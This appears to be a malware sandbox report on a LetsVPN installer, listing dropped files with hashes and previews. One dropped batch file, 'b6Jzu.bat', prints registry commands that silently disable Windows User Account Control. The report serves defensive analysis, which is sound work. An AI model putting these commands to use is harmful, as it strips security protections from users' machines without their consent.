                                                                                                                                                                                                  Preview:BM.&......2...(.......9............!..................,...788.WXX.................................................................h...;m..i...f...O...l...)J[. :G.n...p...o...%AO.....y...W.......o...........8O[.C^l...........#.....................................p...........................................................?AB.....;....+;.>...+y..4....BY.V...f...H...5bz.%DU.j...j...h...d...b...W...N...]....0<.m...Dy..3Zo.c...U...q....Pb.s...v...v...M...y...{...q...}...}.......y............+3.............g...................................Nn..Hfv.................&5=.................................................................................................................................^s~.............................................................................................................................8....Tt.G....!+..........%..................................................\gn.............................................#$%.oqs.....zz{...................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\modern-wizard.bmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 164 x 314 x 8, image size 51498, resolution 2834 x 2834 px/m, 255 important colors, cbSize 52572, bits offset 1074
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):52572
                                                                                                                                                                                                  Entropy (8bit):7.144132089574
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:mfR2FYRtCc9X1uikvgqm+LPTTw9Bu8Skn+x23acmHjZXuxZpCAe9Crxpn319UDSQ:mf0YRt/km+b3wG0nt2UC6rOf
                                                                                                                                                                                                  MD5:7F8E1969B0874C8FB9AB44FC36575380
                                                                                                                                                                                                  SHA1:3057C9CE90A23D29F7D0854472F9F44E87B0F09A
                                                                                                                                                                                                  SHA-256:076221B4527FF13C3E1557ABBBD48B0CB8E5F7D724C6B9171C6AADADB80561DD
                                                                                                                                                                                                  SHA-512:7AA65CFADC2738C0186EF459D0F5F7F770BA0F6DA4CCD55A2CECA23627B7F13BA258136BAB88F4EEE5D9BB70ED0E8EB8BA8E1874B0280D2B08B69FC9BDD81555
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:BM\.......2...(.......:...........*.......................Y[[.....z}~.................................................5by.k...6by.m...o...p...q...9dz.s...t...w...x...`...=f{.{.......}...................~...Q...........b.......-FS.~...m...v............%+.................................................................-;B.................................................................................................................................prs.;....AY.4...(m..E...P...\...f...l...n...o...8cz.l...r...q...q...r...s...t...l...v...u...;dz.v...y...w...w...z...i...y...z...{...~...}.......W...Jw..@g|.....................]...@ey.................Go..............Ch|.<]o.............................|...@bt.9Wg.........5P_.....................................................`...c...t...q...............................................[q}.........................Rcl.....................................:....~...Ts.m........... 1;.......................................!.............+,-...........

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsDialogs.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                  Entropy (8bit):5.157714967617029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                                                                                                                                                                                  MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                                                                                                                                                                                  SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                                                                                                                                                                                  SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                                                                                                                                                                                  SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsExec.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7168
                                                                                                                                                                                                  Entropy (8bit):5.295306975422517
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                                                                                                                                                                                  MD5:11092C1D3FBB449A60695C44F9F3D183
                                                                                                                                                                                                  SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                                                                                                                                                                                  SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                                                                                                                                                                                  SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsProcess.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4608
                                                                                                                                                                                                  Entropy (8bit):4.703695912299512
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Sz4joMeH+Iwdf8Rom/L+rOnnk5/OCnXeAdbdOAa4GPI+CJ87eILzlq7gthwIsEQW:64c/eFdfS/SSnkxNa4G+ueqPuCtGsj
                                                                                                                                                                                                  MD5:F0438A894F3A7E01A4AAE8D1B5DD0289
                                                                                                                                                                                                  SHA1:B058E3FCFB7B550041DA16BF10D8837024C38BF6
                                                                                                                                                                                                  SHA-256:30C6C3DD3CC7FCEA6E6081CE821ADC7B2888542DAE30BF00E881C0A105EB4D11
                                                                                                                                                                                                  SHA-512:F91FCEA19CBDDF8086AFFCB63FE599DC2B36351FC81AC144F58A80A524043DDEAA3943F36C86EBAE45DD82E8FAF622EA7B7C9B776E74C54B93DF2963CFE66CC7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.I...I...I...n}f.L...I...P...@..K...@..H...@..H...RichI...........................PE..L...\..N...........!......................... ...............................`.......................................#....... ..<....@.......................P..|.................................................... ..d............................text............................... ..`.rdata....... ......................@..@.data... ....0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\SETBAA4.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\SETBAD4.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\SETBAE5.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\oemvista.inf (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\tap0901.cat (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\tap0901.sys (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\LetsVPN.lnk

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 05:34:42 2024, mtime=Sun Dec 29 14:29:21 2024, atime=Mon Dec 2 05:34:42 2024, length=247840, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                  Entropy (8bit):4.633294007248609
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8mEXmEAdOE4N55iAsx1dyOd/UUwuEAENqygm:8mEXZAdObBsx1dyOdsIVFyg
                                                                                                                                                                                                  MD5:259DA0DED9E0C1F58D8543433095A921
                                                                                                                                                                                                  SHA1:2FD579DBF5B001B8F343961CC27C63874F42CF93
                                                                                                                                                                                                  SHA-256:5ACF716A416340D469F9BD9A7A13C716737773B89B68832CAA9DBCF2F89F21BF
                                                                                                                                                                                                  SHA-512:1411B62C8B75B5435708F0DEDEFE65CDD85125F2B513D6ABDE1C2795CCAD203F84708CC4CE43C400334CFCD0F4693899D475CB4BFD7E4CD0B169578EECDAF8F3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:L..................F.... ....-.D.D.....n.Z...-.D.D.. ............................P.O. .:i.....+00.../C:\.....................1......Y.{..PROGRA~2.........O.I.Y.{....................V........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1......Y.{..letsvpn.@......Y.{.Y.{............................d.l.e.t.s.v.p.n.....b.2. ....YU4 .LetsPRO.exe.H......YU4.Y.{..............................L.e.t.s.P.R.O...e.x.e.......Y...............-.......X.............#......C:\Program Files (x86)\letsvpn\LetsPRO.exe..B.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.L.e.t.s.P.R.O...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z|...K.J.........`.......X.......932923...........hT..CrF.f4... ..*......,...W..hT..CrF.f4... ..*......,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\Uninstall.lnk

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):824
                                                                                                                                                                                                  Entropy (8bit):3.377677862485207
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:8wl0Va/ledp8A/LK4YRMbdpYgRtbdpYqQ/CNUvH4t2YZ/elFlSJm:8BdOAW4Y+djXdYOUFqy
                                                                                                                                                                                                  MD5:0011458DE2BFE4556889186A69473E2A
                                                                                                                                                                                                  SHA1:03B075F79791A3EA20E0CA82DC375F1E980C4386
                                                                                                                                                                                                  SHA-256:DB3312C1A2D480E1416930D0F28A1EDA75143B3FDF312C1F19510534FD37B9FA
                                                                                                                                                                                                  SHA-512:DA5DD6E5A253F13702DEB42BBA8E37349CB262F311D557B8891AD761387AF2B96B6B91E4BF7E637D3A7C14E2BFE61E476E44703417DE79930B210243A1B20082
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:L..................F........................................................_....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".V.1...........letsvpn.@............................................l.e.t.s.v.p.n.....`.2...........uninst.exe..F............................................u.n.i.n.s.t...e.x.e.......A.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.\.u.n.i.n.s.t...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.l.e.t.s.v.p.n.........*................@Z|...K.J.....................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\b6Jzu.bat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:ASCII text, with CR, LF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):392
                                                                                                                                                                                                  Entropy (8bit):5.141040221765098
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:jLMVjhR1mWEMlTLMVjhR1ZTLMVjhR16Xn:jIV1PMmIV1PZIV1P6X
                                                                                                                                                                                                  MD5:30D6EB22D6AEEC10347239B17B023BF4
                                                                                                                                                                                                  SHA1:E2A6F86D66C699F6E0FF1AC4E140AF4A2A4637D1
                                                                                                                                                                                                  SHA-256:659DF6B190A0B92FC34E3A4457B4A8D11A26A4CAF55DE64DFE79EB1276181F08
                                                                                                                                                                                                  SHA-512:500872C3F2F3F801EC51717690873194675CB7F32CC4A862C09D90C18638D364D49B0E04C32323F52734E5C806E3503A63AC755C7019D762786A72840123DF76
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F ..reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F ..reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F ..

                                                                                                                                                                                                  C:\Users\user\Desktop\LetsVPN.lnk

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 05:34:42 2024, mtime=Sun Dec 29 14:29:43 2024, atime=Mon Dec 2 05:34:42 2024, length=247840, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1064
                                                                                                                                                                                                  Entropy (8bit):4.669417118259061
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8m0CmEAdOE46R35iAsxXdyOd/UUwuEAENqygm:8m1ZAdOWBsxXdyOdsIVFyg
                                                                                                                                                                                                  MD5:3E8018425B28739FF6113A286C7005A4
                                                                                                                                                                                                  SHA1:B16F750B329CF06CBF6E8D316B5B35DED55D46FA
                                                                                                                                                                                                  SHA-256:F94E6F55AC278E498EC0C4D0145584D7FACEAE69A28C05B13768769B862486A1
                                                                                                                                                                                                  SHA-512:1197A04EFA78B50688CB1E9B43EDD519193DD272CD33D8FF981BA8D19158A789609C78AB5A0B39D9154871C46597C5FE62616B5CEB939A944BA2F5E4EE97346E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
